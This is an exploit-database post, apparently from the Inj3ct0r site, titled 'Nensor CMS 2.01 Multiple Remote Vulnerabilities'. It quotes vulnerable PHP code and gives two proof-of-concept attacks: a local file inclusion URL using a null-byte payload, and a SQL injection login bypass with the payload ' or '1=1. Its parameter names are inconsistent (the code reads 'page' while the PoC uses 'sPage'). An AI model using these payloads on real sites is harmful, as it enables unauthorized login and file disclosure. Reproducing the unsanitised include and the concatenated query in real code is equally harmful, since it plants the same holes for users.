[+] Nensor CMS 2.01 Multiple Remote Vulnerabilities
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \\\ \/\ \\ 0
0 \//\//\//\ \\ \// \// \// \// \// 1
1 \ \/ >> Exploit database separated by exploit 0
0 \// type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm cr4wl3r member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Discovered By: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original : http://inj3ct0r.com/exploits/11346
[+] Download: http://code.google.com/p/nensor-cms/downloads/list
[x] LFI:
$sPage=(isset($_GET["page"]))?$_GET["page"]:"";
if(is_file("".$sPage.".php")){
include "".$sPage.".php";
}elseif(is_file("".$sPage.".js")){
include "".$sPage.".js";
}
[x] LFI PoC: [payh]/x/modules/javascript.php?sPage=[LFI%00]
[x] Auth Bypass:
$sql = "SELECT iKey,sUsername,iKeyGroup,bForumAdmin,sLanguage,sPassword,sMail,sType
FROM tb_users
WHERE sUsername='".strInput($_POST["sUsername"])."'
AND sPassword='".md5($_POST["sPassword"])."'
AND bActive=1";
[x] PoC: ' or '1=1